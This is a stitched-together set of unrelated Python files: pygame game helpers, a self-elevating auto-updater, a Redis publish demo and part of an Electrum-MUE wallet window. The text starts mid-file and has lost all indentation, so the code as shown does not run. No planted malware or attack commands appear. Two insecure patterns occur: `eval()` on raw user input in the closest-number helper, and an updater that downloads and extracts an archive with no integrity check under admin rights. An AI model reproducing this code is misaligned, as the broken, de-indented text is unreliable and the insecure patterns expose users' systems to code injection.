settings_file.write(json_settings)
main()
from pygame.locals import *
import pygame
import class_
import random
def closest(me, others):
possible_destinations = others
possible_destinations = [
abs(me - destination) for destination in possible_destinations
]
destination = min(possible_destinations)
return others[possible_destinations.index(destination)]
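# e.g. closest(7, [3, 10, 52]) returns 10, since the absolute differences are
# 4, 3 and 45 and 10 is the entry with the smallest one.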
print(
closest(
int(input('number: ')),
        eval(input('enter numbers to be closest to separated by ,: '))))
from class_.events import *
def put_all(main_game_state, event):
for sprite in main_game_state.sprites():
sprite.internal_event(event)
def quit_all(main_game_state):
put_all(main_game_state, Quit())
with open('../stickmanranger.log') as o:
p = o.readlines()[-1]
with open('changes.html', 'r+') as o:
d = o.readlines()
import pprint
pprint.pprint(d)
index = d.index(
' </div> <!-- this is a comment just for automation.-->\n')
#d.insert(index, '<br/>hiiiiiiii\n')
d.insert(index, ''.join((' <br>', p, '\n')))
o.seek(0)
o.write(''.join(d))
o.truncate()
# -*- coding: utf-8 -*-
"""
auto_installer.py
this file downloads the new version of stickmanranger and installs it
"""
__author__ = 'Michael Gill'
__version__ = '0.0'
from queue import Queue
from platform import system
import tkinter as tk
import threading
import json
import ctypes
import sys
import urllib.request
import shutil
import tarfile
import os
Q = Queue()
PRINT_LOCK = threading.Lock()
class InstallWindow(tk.Frame):
destroyed = False
def __init__(self, master=None):
tk.Frame.__init__(self, master)
master.protocol("WM_DELETE_WINDOW", self.cancel_install)
self.master = master
master.title('auto-updater')
self.but = tk.Button(
master, text='cancel', command=self.cancel_install)
self.but.pack()
self.but.place(relx=0.4, rely=0.7)
self.pack()
def cancel_install(self):
self.destroyed = True
self.master.destroy()
def check_queue(self):
if Q.empty():
return False
data = Q.get()
# the versions have been loaded
print('is "data" a dict?:', isinstance(data, dict))
print('data:', data)
if data is None:
self.label = tk.Label(self.master, text='No updates available')
self.label.pack()
self.label.place(relx=0.0, rely=0.1)
self.but.destroy()
close_but = tk.Button(
self.master, text='close', command=self.cancel_install)
close_but.pack()
close_but.place(relx=0.4, rely=0.7)
if isinstance(data, dict):
data_string = 'current version: {current version} available version: {available version}'.format(
**data)
print('before tk.Label')
self.label = tk.Label(self.master, text=data_string)
print('after tk.Label')
self.label.pack()
self.label.place(relx=0.0, rely=0.1)
print('hello')
self.install_but = tk.Button(
self.master, text='install', command=lambda: run(self))
print('helo again')
self.install_but.pack()
self.install_but.place(relx=0.2, rely=0.7)
print('howdy')
elif isinstance(data, str):
self.label.destroy()
self.label = tk.Label(self.master, text=data)
self.label.pack()
self.label.place(relx=0.0, rely=0.1)
if system() not in ('Linux', 'Windows'):
raise TypeError('Not made for this %a' % system())
VER_URL = "https://drive.google.com/uc?export=download&id=17KGPTgF6xWKH3dk7Sd74niL548WU6Tts"
ARCHIVE_URL = "https://github.com/Michael78912/smnw-archives/blob/master/stickman's%20new%20world.tar.gz"
# temporary directory. on Windows it is read from the TMP environment variable
TEMP_PATH = '/tmp' if system() == 'Linux' else os.environ['TMP']
INSTALL_PATH = os.path.join(
os.environ['HOME'], '.stickman\'s new world/') if system(
) == 'Linux' else "C:\\Program Files (x86)\\stickman\'s new world\\"
def run(obj):
obj.install_but.destroy()
obj.but.destroy()
threading.Thread(target=main, daemon=True).start()
def main():
Q.put('fetching stickmanranger.tar.gz...')
with urllib.request.urlopen(ARCHIVE_URL,) as response, \
open(os.path.join(TEMP_PATH, 'stickmanranger.tmp.tar.gz'), 'wb') as out_file:
shutil.copyfileobj(response, out_file)
if os.path.exists(INSTALL_PATH + 'game'):
Q.put('removing previous installation')
shutil.rmtree(INSTALL_PATH + 'game')
# extract all contents to the path
Q.put('extracting contents')
tarfile.open(os.path.join(
TEMP_PATH,
'stickmanranger.tmp.tar.gz')).extractall(INSTALL_PATH + 'game')
Q.put('installation complete\nplease restart stickmans new world.')
def check():
data = {}
# VER_URL is a shared google drive link that has the current version of stickmanranger
with urllib.request.urlopen(VER_URL) as response:
version = response.read().decode()
    # decode the current version from the local game config file
current_version = json.JSONDecoder().decode(
open('..{0}game{0}config{0}linux_config.json'.format(
'\\' if os.name == 'nt' else '/')).read())['version']
# if the version is the same
with PRINT_LOCK:
print(current_version, version)
data['current version'] = current_version
data['available version'] = version
if data['current version'] == data['available version']:
Q.put(None)
else:
Q.put(data)
if current_version == version:
with PRINT_LOCK:
print('no new updates')
return False
def start_thread():
"""
starts the thread for the actual installation,
and use main thread for window.
"""
root = tk.Tk()
root.geometry('300x200')
window = InstallWindow(root)
    # run the version check in a worker thread; the main thread keeps updating the window
install_thread = threading.Thread(target=check, daemon=True)
install_thread.start()
while not window.destroyed:
try:
window.check_queue()
except: # 'cancel' button has been clicked, continue
...
if not window.destroyed: root.update()
def is_admin():
"""
return true if the program was run as an administrator
code not by me. thanks Martín De la Fuente!
https://stackoverflow.com/questions/130763/request-uac-elevation-from-within-a-python-script
"""
try:
return ctypes.windll.shell32.IsUserAnAdmin()
except:
return False
def name_main(started_from_main_=False):
global started_from_main
started_from_main = started_from_main_
if __name__ == '__main__':
if system() == 'Windows':
if is_admin():
start_thread()
else:
            # Re-run the program with admin rights
ctypes.windll.shell32.ShellExecuteW(
None, "runas", sys.executable, __file__, None, 1)
if system() == 'Linux':
start_thread()
name_main()
# publish.py
#!/usr/bin/env python3
import json
import random
import redis
import time
from threading import Thread
# Replace with your configuration information
redis_host = "localhost"
redis_port = 6379
redis_password = ""
event_channels = {
'login': 'user_event:login',
'view': 'user_event:view',
'logout': 'user_event:logout',
}
event_types = list(event_channels.keys())
def publisher():
"""Publishes simulated event messages to a Redis Channel"""
    # Create a Redis connection object
    r = redis.Redis(host=redis_host, port=redis_port, password=redis_password)
    for id in range(50):
        # create the event as a dict with fields type and id
event = {}
event['type'] = event_types[ random.randint(0, len(event_types) - 1) ]
event['id'] = id
# convert the event to json and log to the console
event_message = json.dumps(event)
channel = event_channels[event['type']]
print("Sending message {} -> {}".format(event_message, channel))
        # publish the event to its channel; publish() returns the number
        # of subscribers that received the message
        cnt = r.publish(channel, event_message)
print("Delivered message to {} subscribers".format(cnt))
time.sleep(0.001)
# send a terminate message to all clients
term = { 'type': 'terminate'}
term_message = json.dumps(term)
channel = 'process:terminate'
print("Sending terminate message")
    # publish the terminate message to the process:terminate channel
    cnt = r.publish(channel, term_message)
print("Delivered message to {} subscribers".format(cnt))
def run_publisher():
"""Sets up a pubsub simulation environment with one publisher and 5 subscribers"""
p = Thread(target=publisher)
p.start()
if __name__ == '__main__':
run_publisher()
# main_window.py
#!/usr/bin/env python
#
# Electrum - lightweight Bitcoin client
# Copyright (C) 2012 thomasv@gitorious
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#
# Electrum-MUE - lightweight MUE client
# Copyright (C) 2018 random.zebra
# Copyright (C) 2018 sotblad
import sys, time, threading
import os, json, traceback
import shutil
import weakref
import webbrowser
import csv
from decimal import Decimal
import base64
from functools import partial
from PyQt5.QtCore import Qt
from PyQt5.QtGui import *
from PyQt5.QtWidgets import *
from electrum.util import bh2u, bfh
from electrum import keystore, simple_config
from electrum.bitcoin import COIN, is_address, TYPE_ADDRESS, NetworkConstants
from electrum.plugins import run_hook
from electrum.i18n import _
from electrum.util import (format_time, format_satoshis, PrintError,
format_satoshis_plain, NotEnoughFunds,
UserCancelled, NoDynamicFeeEstimates)
from electrum import Transaction
from electrum import util, bitcoin, commands, coinchooser
from electrum import paymentrequest
from electrum.wallet import Multisig_Wallet
try:
from electrum.plot import plot_history
except:
plot_history = None
from .amountedit import AmountEdit, BTCAmountEdit, MyLineEdit, FeerateEdit
from .qrcodewidget import QRCodeWidget, QRDialog
from .qrtextedit import ShowQRTextEdit, ScanQRTextEdit
from .transaction_dialog import show_transaction
from .fee_slider import FeeSlider
from .util import *
class StatusBarButton(QPushButton):
def __init__(self, icon, tooltip, func):
QPushButton.__init__(self, icon, '')
self.setToolTip(tooltip)
self.setFlat(True)
self.setMaximumWidth(25)
self.clicked.connect(self.onPress)
self.func = func
self.setIconSize(QSize(25,25))
def onPress(self, checked=False):
'''Drops the unwanted PyQt5 "checked" argument'''
self.func()
def keyPressEvent(self, e):
if e.key() == Qt.Key_Return:
self.func()
from electrum.paymentrequest import PR_PAID
class ElectrumWindow(QMainWindow, MessageBoxMixin, PrintError):
payment_request_ok_signal = pyqtSignal()
payment_request_error_signal = pyqtSignal()
notify_transactions_signal = pyqtSignal()
new_fx_quotes_signal = pyqtSignal()
new_fx_history_signal = pyqtSignal()
network_signal = pyqtSignal(str, object)
alias_received_signal = pyqtSignal()
computing_privkeys_signal = pyqtSignal()
show_privkeys_signal = pyqtSignal()
def __init__(self, gui_object, wallet):
QMainWindow.__init__(self)
self.gui_object = gui_object
self.config = config = gui_object.config
self.network = gui_object.daemon.network
self.fx = gui_object.daemon.fx
self.invoices = wallet.invoices
self.contacts = wallet.contacts
self.tray = gui_object.tray
self.app = gui_object.app
self.cleaned_up = False
self.is_max = False
self.payment_request = None
self.checking_accounts = False
self.qr_window = None
self.not_enough_funds = False
self.pluginsdialog = None
self.require_fee_update = False
self.tx_notifications = []
self.tl_windows = []
self.tx_external_keypairs = {}
self.create_status_bar()
self.need_update = threading.Event()
self.decimal_point = config.get('decimal_point', 8)
self.fee_unit = config.get('fee_unit', 0)
self.num_zeros = int(config.get('num_zeros',0))
self.completions = QStringListModel()
self.tabs = tabs = QTabWidget(self)
self.send_tab = self.create_send_tab()
self.receive_tab = self.create_receive_tab()
self.addresses_tab = self.create_addresses_tab()
self.utxo_tab = self.create_utxo_tab()
self.console_tab = self.create_console_tab()
self.contacts_tab = self.create_contacts_tab()
tabs.addTab(self.create_history_tab(), QIcon(":icons/tab_history.png"), _('History'))
tabs.addTab(self.send_tab, QIcon(":icons/tab_send.png"), _('Send'))
tabs.addTab(self.receive_tab, QIcon(":icons/tab_receive.png"), _('Receive'))
def add_optional_tab(tabs, tab, icon, description, name):
tab.tab_icon = icon
tab.tab_description = description
tab.tab_pos = len(tabs)
tab.tab_name = name
if self.config.get('show_{}_tab'.format(name), False):
tabs.addTab(tab, icon, description.replace("&", ""))
add_optional_tab(tabs, self.addresses_tab, QIcon(":icons/tab_addresses.png"), _("&Addresses"), "addresses")
add_optional_tab(tabs, self.utxo_tab, QIcon(":icons/tab_coins.png"), _("Co&ins"), "utxo")
add_optional_tab(tabs, self.contacts_tab, QIcon(":icons/tab_contacts.png"), _("Con&tacts"), "contacts")
add_optional_tab(tabs, self.console_tab, QIcon(":icons/tab_console.png"), _("Con&sole"), "console")
tabs.setSizePolicy(QSizePolicy.Expanding, QSizePolicy.Expanding)
self.setCentralWidget(tabs)
if self.config.get("is_maximized"):
self.showMaximized()
self.setWindowIcon(QIcon(":icons/electrum.png"))
self.init_menubar()
wrtabs = weakref.proxy(tabs)
QShortcut(QKeySequence("Ctrl+W"), self, self.close)
QShortcut(QKeySequence("Ctrl+Q"), self, self.close)
QShortcut(QKeySequence("Ctrl+R"), self, self.update_wallet)
QShortcut(QKeySequence("Ctrl+PgUp"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() - 1)%wrtabs.count()))
QShortcut(QKeySequence("Ctrl+PgDown"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() + 1)%wrtabs.count()))
for i in range(wrtabs.count()):
QShortcut(QKeySequence("Alt+" + str(i + 1)), self, lambda i=i: wrtabs.setCurrentIndex(i))
self.payment_request_ok_signal.connect(self.payment_request_ok)
self.payment_request_error_signal.connect(self.payment_request_error)
self.notify_transactions_signal.connect(self.notify_transactions)
self.history_list.setFocus(True)
# network callbacks
if self.network:
self.network_signal.connect(self.on_network_qt)
interests = ['updated', 'new_transaction', 'status',
'banner', 'verified', 'fee']
# To avoid leaking references to "self" that prevent the
# window from being GC-ed when closed, callbacks should be
# methods of this class only, and specifically not be
# partials, lambdas or methods of subobjects. Hence...
self.network.register_callback(self.on_network, interests)
# set initial message
self.console.showMessage(self.network.banner)
self.network.register_callback(self.on_quotes, ['on_quotes'])
self.network.register_callback(self.on_history, ['on_history'])
self.new_fx_quotes_signal.connect(self.on_fx_quotes)
self.new_fx_history_signal.connect(self.on_fx_history)
# update fee slider in case we missed the callback
self.fee_slider.update()
self.load_wallet(wallet)
self.connect_slots(gui_object.timer)
self.fetch_alias()
def on_history(self, b):
self.new_fx_history_signal.emit()
def on_fx_history(self):
self.history_list.refresh_headers()
self.history_list.update()
self.address_list.update()
def on_quotes(self, b):
self.new_fx_quotes_signal.emit()
def on_fx_quotes(self):
self.update_status()
# Refresh edits with the new rate
edit = self.fiat_send_e if self.fiat_send_e.is_last_edited else self.amount_e
edit.textEdited.emit(edit.text())
edit = self.fiat_receive_e if self.fiat_receive_e.is_last_edited else self.receive_amount_e
edit.textEdited.emit(edit.text())
# History tab needs updating if it used spot
if self.fx.history_used_spot:
self.history_list.update()
def toggle_tab(self, tab):
show = not self.config.get('show_{}_tab'.format(tab.tab_name), False)
self.config.set_key('show_{}_tab'.format(tab.tab_name), show)
item_text = (_("Hide") if show else _("Show")) + " " + tab.tab_description
tab.menu_action.setText(item_text)
if show:
# Find out where to place the tab
index = len(self.tabs)
for i in range(len(self.tabs)):
try:
if tab.tab_pos < self.tabs.widget(i).tab_pos:
index = i
break
except AttributeError:
pass
self.tabs.insertTab(index, tab, tab.tab_icon, tab.tab_description.replace("&", ""))
else:
i = self.tabs.indexOf(tab)
self.tabs.removeTab(i)
def push_top_level_window(self, window):
'''Used for e.g. tx dialog box to ensure new dialogs are appropriately
parented. This used to be done by explicitly providing the parent
window, but that isn't something hardware wallet prompts know.'''
self.tl_windows.append(window)
def pop_top_level_window(self, window):
self.tl_windows.remove(window)
def top_level_window(self):
'''Do the right thing in the presence of tx dialog windows'''
override = self.tl_windows[-1] if self.tl_windows else None
return self.top_level_window_recurse(override)
def diagnostic_name(self):
return "%s/%s" % (PrintError.diagnostic_name(self),
self.wallet.basename() if self.wallet else "None")
def is_hidden(self):
return self.isMinimized() or self.isHidden()
def show_or_hide(self):
if self.is_hidden():
self.bring_to_top()
else:
self.hide()
def bring_to_top(self):
self.show()
self.raise_()
def on_error(self, exc_info):
if not isinstance(exc_info[1], UserCancelled):
traceback.print_exception(*exc_info)
self.show_error(str(exc_info[1]))
def on_network(self, event, *args):
if event == 'updated':
self.need_update.set()
self.gui_object.network_updated_signal_obj.network_updated_signal \
.emit(event, args)
elif event == 'new_transaction':
self.tx_notifications.append(args[0])
self.notify_transactions_signal.emit()
elif event in ['status', 'banner', 'verified', 'fee']:
# Handle in GUI thread
self.network_signal.emit(event, args)
else:
self.print_error("unexpected network message:", event, args)
def on_network_qt(self, event, args=None):
# Handle a network message in the GUI thread
if event == 'status':
self.update_status()
elif event == 'banner':
self.console.showMessage(args[0])
elif event == 'verified':
self.history_list.update_item(*args)
elif event == 'fee':
if self.config.is_dynfee():
self.fee_slider.update()
self.do_update_fee()
else:
self.print_error("unexpected network_qt signal:", event, args)
def fetch_alias(self):
self.alias_info = None
alias = self.config.get('alias')
if alias:
alias = str(alias)
def f():
self.alias_info = self.contacts.resolve_openalias(alias)
self.alias_received_signal.emit()
t = threading.Thread(target=f)
t.setDaemon(True)
t.start()
def close_wallet(self):
if self.wallet:
self.print_error('close_wallet', self.wallet.storage.path)
run_hook('close_wallet', self.wallet)
def load_wallet(self, wallet):
wallet.thread = TaskThread(self, self.on_error)
self.wallet = wallet
self.update_recently_visited(wallet.storage.path)
# address used to create a dummy transaction and estimate transaction fee
self.history_list.update()
self.address_list.update()
self.utxo_list.update()
self.need_update.set()
# Once GUI has been initialized check if we want to announce something since the callback has been called before the GUI was initialized
self.notify_transactions()
# update menus
self.seed_menu.setEnabled(self.wallet.has_seed())
self.update_lock_icon()
self.update_buttons_on_seed()
self.update_console()
self.clear_receive_tab()
self.request_list.update()
self.tabs.show()
self.init_geometry()
if self.config.get('hide_gui') and self.gui_object.tray.isVisible():
self.hide()
else:
self.show()
self.watching_only_changed()
run_hook('load_wallet', wallet, self)
def init_geometry(self):
winpos = self.wallet.storage.get("winpos-qt")
try:
screen = self.app.desktop().screenGeometry()
assert screen.contains(QRect(*winpos))
self.setGeometry(*winpos)
except:
self.print_error("using default geometry")
self.setGeometry(100, 100, 840, 400)
def watching_only_changed(self):
name = "Electrum-MUE Testnet" if NetworkConstants.TESTNET else "Electrum-MUE"
title = '%s %s - %s' % (name, self.wallet.electrum_version,
self.wallet.basename())
extra = [self.wallet.storage.get('wallet_type', '?')]
if self.wallet.is_watching_only():
self.warn_if_watching_only()
extra.append(_('watching only'))
title += ' [%s]'% ', '.join(extra)
self.setWindowTitle(title)
self.password_menu.setEnabled(self.wallet.can_change_password())
self.import_privkey_menu.setVisible(self.wallet.can_import_privkey())
self.import_address_menu.setVisible(self.wallet.can_import_address())
self.export_menu.setEnabled(self.wallet.can_export())
def warn_if_watching_only(self):
if self.wallet.is_watching_only():
msg = ' '.join([
_("This wallet is watching-only."),
_("This means you will not be able to spend Bitcoins with it."),
_("Make sure you own the seed phrase or the private keys, before you request Bitcoins to be sent to this wallet.")
])
self.show_warning(msg, title=_('Information'))
def open_wallet(self):
wallet_folder = self.get_wallet_folder()
filename, __ = QFileDialog.getOpenFileName(self, "Select your wallet file", wallet_folder)
if not filename:
return
self.gui_object.new_window(filename)
def backup_wallet(self):
path = self.wallet.storage.path
wallet_folder = os.path.dirname(path)
filename, __ = QFileDialog.getSaveFileName(self, _('Enter a filename for the copy of your wallet'), wallet_folder)
if not filename:
return
new_path = os.path.join(wallet_folder, filename)
if new_path != path:
try:
shutil.copy2(path, new_path)
self.show_message(_("A copy of your wallet file was created in")+" '%s'" % str(new_path), title=_("Wallet backup created"))
except (IOError, os.error) as reason:
self.show_critical(_("Electrum was unable to copy your wallet file to the specified location.") + "\n" + str(reason), title=_("Unable to create backup"))
def update_recently_visited(self, filename):
recent = self.config.get('recently_open', [])
try:
sorted(recent)
except:
recent = []
if filename in recent:
recent.remove(filename)
recent.insert(0, filename)
recent = recent[:5]
self.config.set_key('recently_open', recent)
self.recently_visited_menu.clear()
for i, k in enumerate(sorted(recent)):
b = os.path.basename(k)
def loader(k):
return lambda: self.gui_object.new_window(k)
self.recently_visited_menu.addAction(b, loader(k)).setShortcut(QKeySequence("Ctrl+%d"%(i+1)))
self.recently_visited_menu.setEnabled(len(recent))
def get_wallet_folder(self):
return os.path.dirname(os.path.abspath(self.config.get_wallet_path()))
def new_wallet(self):
wallet_folder = self.get_wallet_folder()
i = 1
while True:
filename = "wallet_%d" % i
if filename in os.listdir(wallet_folder):
i += 1
else:
break
full_path = os.path.join(wallet_folder, filename)
self.gui_object.start_new_window(full_path, None)
def init_menubar(self):
menubar = QMenuBar()
file_menu = menubar.addMenu(_("&File"))
self.recently_visited_menu = file_menu.addMenu(_("&Recently open"))
file_menu.addAction(_("&Open"), self.open_wallet).setShortcut(QKeySequence.Open)
file_menu.addAction(_("&New/Restore"), self.new_wallet).setShortcut(QKeySequence.New)
file_menu.addAction(_("&Save Copy"), self.backup_wallet).setShortcut(QKeySequence.SaveAs)
file_menu.addAction(_("Delete"), self.remove_wallet)
file_menu.addSeparator()
file_menu.addAction(_("&Quit"), self.close)
wallet_menu = menubar.addMenu(_("&Wallet"))
wallet_menu.addAction(_("&Information"), self.show_master_public_keys)
wallet_menu.addSeparator()
self.password_menu = wallet_menu.addAction(_("&Password"), self.change_password_dialog)
self.seed_menu = wallet_menu.addAction(_("&Seed"), self.show_seed_dialog)
self.private_keys_menu = wallet_menu.addMenu(_("&Private keys"))
self.private_keys_menu.addAction(_("&Sweep"), self.sweep_key_dialog)
self.import_privkey_menu = self.private_keys_menu.addAction(_("&Import"), self.do_import_privkey)
self.export_menu = self.private_keys_menu.addAction(_("&Export"), self.export_privkeys_dialog)
self.import_address_menu = wallet_menu.addAction(_("Import addresses"), self.import_addresses)
wallet_menu.addSeparator()
labels_menu = wallet_menu.addMenu(_("&Labels"))
labels_menu.addAction(_("&Import"), self.do_import_labels)
labels_menu.addAction(_("&Export"), self.do_export_labels)
contacts_menu = wallet_menu.addMenu(_("Contacts"))
contacts_menu.addAction(_("&New"), self.new_contact_dialog)
contacts_menu.addAction(_("Import"), lambda: self.contact_list.import_contacts())
invoices_menu = wallet_menu.addMenu(_("Invoices"))
invoices_menu.addAction(_("Import"), lambda: self.invoice_list.import_invoices())
hist_menu = wallet_menu.addMenu(_("&History"))
hist_menu.addAction("Plot", self.plot_history_dialog).setEnabled(plot_history is not None)
hist_menu.addAction("Export", self.export_history_dialog)
wallet_menu.addSeparator()
wallet_menu.addAction(_("Find"), self.toggle_search).setShortcut(QKeySequence("Ctrl+F"))
def add_toggle_action(view_menu, tab):
is_shown = self.config.get('show_{}_tab'.format(tab.tab_name), False)
item_name = (_("Hide") if is_shown else _("Show")) + " " + tab.tab_description
tab.menu_action = view_menu.addAction(item_name, lambda: self.toggle_tab(tab))
view_menu = menubar.addMenu(_("&View"))
add_toggle_action(view_menu, self.addresses_tab)
add_toggle_action(view_menu, self.utxo_tab)
add_toggle_action(view_menu, self.contacts_tab)
add_toggle_action(view_menu, self.console_tab)
tools_menu = menubar.addMenu(_("&Tools"))
        # Settings / Preferences are reserved keywords in OSX; this is used as a workaround
tools_menu.addAction(_("Electrum preferences") if sys.platform == 'darwin' else _("Preferences"), self.settings_dialog)
tools_menu.addAction(_("&Network"), lambda: self.gui_object.show_network_dialog(self))
tools_menu.addAction(_("&Plugins"), self.plugins_dialog)
tools_menu.addSeparator()
tools_menu.addAction(_("&Sign/verify message"), self.sign_verify_message)
tools_menu.addAction(_("&Encrypt/decrypt message"), self.encrypt_message)
tools_menu.addSeparator()
paytomany_menu = tools_menu.addAction(_("&Pay to many"), self.paytomany)
raw_transaction_menu = tools_menu.addMenu(_("&Load transaction"))
raw_transaction_menu.addAction(_("&From file"), self.do_process_from_file)
raw_transaction_menu.addAction(_("&From text"), self.do_process_from_text)
raw_transaction_menu.addAction(_("&From the blockchain"), self.do_process_from_txid)
raw_transaction_menu.addAction(_("&From QR code"), self.read_tx_from_qrcode)
self.raw_transaction_menu = raw_transaction_menu
run_hook('init_menubar_tools', self, tools_menu)
help_menu = menubar.addMenu(_("&Help"))
help_menu.addAction(_("&About"), self.show_about)
help_menu.addAction(_("&Official website"), lambda: webbrowser.open("http://electrum.org"))
help_menu.addSeparator()
help_menu.addAction(_("&Documentation"), lambda: webbrowser.open("http://docs.electrum.org/")).setShortcut(QKeySequence.HelpContents)
help_menu.addAction(_("&Report Bug"), self.show_report_bug)
help_menu.addSeparator()
help_menu.addAction(_("&Donate to server"), self.donate_to_server)
self.setMenuBar(menubar)
def donate_to_server(self):
d = self.network.get_donation_address()
if d:
host = self.network.get_parameters()[0]
self.pay_to_URI('bitcoin:%s?message=donation for %s'%(d, host))
else:
self.show_error(_('No donation address for this server'))
def show_about(self):
QMessageBox.about(self, "Electrum",
_("Version")+" %s" % (self.wallet.electrum_version) + "\n\n" +
_("Electrum's focus is speed, with low resource usage and simplifying Bitcoin. You do not need to perform regular backups, because your wallet can be recovered from a secret phrase that you can memorize or write on paper. Startup times are instant because it operates in conjunction with high-performance servers that handle the most complicated parts of the Bitcoin system." + "\n\n" +
_("Uses icons from the Icons8 icon pack (icons8.com).")))
def show_report_bug(self):
msg = ' '.join([
_("Please report any bugs as issues on github:<br/>"),
"<a href=\"https://github.com/spesmilo/electrum/issues\">https://github.com/spesmilo/electrum/issues</a><br/><br/>",
_("Before reporting a bug, upgrade to the most recent version of Electrum (latest release or git HEAD), and include the version number in your report."),
_("Try to explain not only what the bug is, but how it occurs.")
])
self.show_message(msg, title="Electrum - " + _("Reporting Bugs"))
def notify_transactions(self):
if not self.network or not self.network.is_connected():
return
self.print_error("Notifying GUI")
if len(self.tx_notifications) > 0:
            # Combine the transactions if there are more than three
tx_amount = len(self.tx_notifications)
if(tx_amount >= 3):
total_amount = 0
for tx in self.tx_notifications:
is_relevant, is_mine, v, fee = self.wallet.get_wallet_delta(tx)
if(v > 0):
total_amount += v
self.notify(_("%(txs)s new transactions received: Total amount received in the new transactions %(amount)s") \
% { 'txs' : tx_amount, 'amount' : self.format_amount_and_units(total_amount)})
self.tx_notifications = []
else:
for tx in self.tx_notifications:
if tx:
self.tx_notifications.remove(tx)
is_relevant, is_mine, v, fee = self.wallet.get_wallet_delta(tx)
if(v > 0):
self.notify(_("New transaction received: %(amount)s") % { 'amount' : self.format_amount_and_units(v)})
def notify(self, message):
if self.tray:
try:
# this requires Qt 5.9
self.tray.showMessage("Electrum", message, QIcon(":icons/electrum_dark_icon"), 20000)
except TypeError:
self.tray.showMessage("Electrum", message, QSystemTrayIcon.Information, 20000)
# custom wrappers for getOpenFileName and getSaveFileName, that remember the path selected by the user
def getOpenFileName(self, title, filter = ""):
directory = self.config.get('io_dir', os.path.expanduser('~'))
fileName, __ = QFileDialog.getOpenFileName(self, title, directory, filter)
if fileName and directory != os.path.dirname(fileName):
self.config.set_key('io_dir', os.path.dirname(fileName), True)
return fileName
def getSaveFileName(self, title, filename, filter = ""):
directory = self.config.get('io_dir', os.path.expanduser('~'))
path = os.path.join( directory, filename )
fileName, __ = QFileDialog.getSaveFileName(self, title, path, filter)
if fileName and directory != os.path.dirname(fileName):
self.config.set_key('io_dir', os.path.dirname(fileName), True)
return fileName
def connect_slots(self, sender):
sender.timer_signal.connect(self.timer_actions)
def timer_actions(self):
# Note this runs in the GUI thread
if self.need_update.is_set():
self.need_update.clear()
self.update_wallet()
# resolve aliases
# FIXME this is a blocking network call that has a timeout of 5 sec
self.payto_e.resolve()
# update fee
if self.require_fee_update:
self.do_update_fee()
self.require_fee_update = False
def format_amount(self, x, is_diff=False, whitespaces=False):
return format_satoshis(x, is_diff, self.num_zeros, self.decimal_point, whitespaces)
def format_amount_and_units(self, amount):
text = self.format_amount(amount) + ' '+ self.base_unit()
x = self.fx.format_amount_and_units(amount) if self.fx else None
if text and x:
text += ' (%s)'%x
return text
def format_fee_rate(self, fee_rate):
if self.fee_unit == 0:
return format_satoshis(fee_rate/1000, False, self.num_zeros, 0, False) + ' sat/byte'
else:
return self.format_amount(fee_rate) + ' ' + self.base_unit() + '/kB'
def get_decimal_point(self):
return self.decimal_point
def base_unit(self):
assert self.decimal_point in [2, 5, 8]
if self.decimal_point == 2:
return 'bits'
if self.decimal_point == 5:
return 'mMUE'
if self.decimal_point == 8:
return 'MUE'
raise Exception('Unknown base unit')
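    # Illustrative note: the decimal point setting shifts the displayed unit, e.g.
    # with decimal_point == 5 an amount of 123456789 base units is rendered as
    # 1234.56789 mMUE (the point is placed five digits from the right).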
def connect_fields(self, window, btc_e, fiat_e, fee_e):
def edit_changed(edit):
if edit.follows:
return
edit.setStyleSheet(ColorScheme.DEFAULT.as_stylesheet())
fiat_e.is_last_edited = (edit == fiat_e)
amount = edit.get_amount()
rate = self.fx.exchange_rate() if self.fx else None
if rate is None or amount is None:
if edit is fiat_e:
btc_e.setText("")
if fee_e:
fee_e.setText("")
else:
fiat_e.setText("")
else:
if edit is fiat_e:
btc_e.follows = True
btc_e.setAmount(int(amount / Decimal(rate) * COIN))
btc_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet())
btc_e.follows = False
if fee_e:
window.update_fee()
else:
fiat_e.follows = True
fiat_e.setText(self.fx.ccy_amount_str(
amount * Decimal(rate) / COIN, False))
fiat_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet())
fiat_e.follows = False
btc_e.follows = False
fiat_e.follows = False
fiat_e.textChanged.connect(partial(edit_changed, fiat_e))
btc_e.textChanged.connect(partial(edit_changed, btc_e))
fiat_e.is_last_edited = False
def update_status(self):
if not self.wallet:
return
if self.network is None or not self.network.is_running():
text = _("Offline")
icon = QIcon(":icons/status_disconnected.png")
elif self.network.is_connected():
server_height = self.network.get_server_height()
server_lag = self.network.get_local_height() - server_height
# Server height can be 0 after switching to a new server
# until we get a headers subscription request response.
# Display the synchronizing message in that case.
if not self.wallet.up_to_date or server_height == 0:
text = _("Synchronizing...")
icon = QIcon(":icons/status_waiting.png")
elif server_lag > 1:
text = _("Server is lagging (%d blocks)"%server_lag)
icon = QIcon(":icons/status_lagging.png")
else:
c, u, x = self.wallet.get_balance()
text = _("Balance" ) + ": %s "%(self.format_amount_and_units(c))
if u:
text += " [%s unconfirmed]"%(self.format_amount(u, True).strip())
if x:
text += " [%s unmatured]"%(self.format_amount(x, True).strip())
# append fiat balance and price
if self.fx.is_enabled():
text += self.fx.get_fiat_status_text(c + u + x,
self.base_unit(), self.get_decimal_point()) or ''
if not self.network.proxy:
icon = QIcon(":icons/status_connected.png")
else:
icon = QIcon(":icons/status_connected_proxy.png")
else:
text = _("Not connected")
icon = QIcon(":icons/status_disconnected.png")
self.tray.setToolTip("%s (%s)" % (text, self.wallet.basename()))
self.balance_label.setText(text)
self.status_button.setIcon( icon )
def update_wallet(self):
self.update_status()
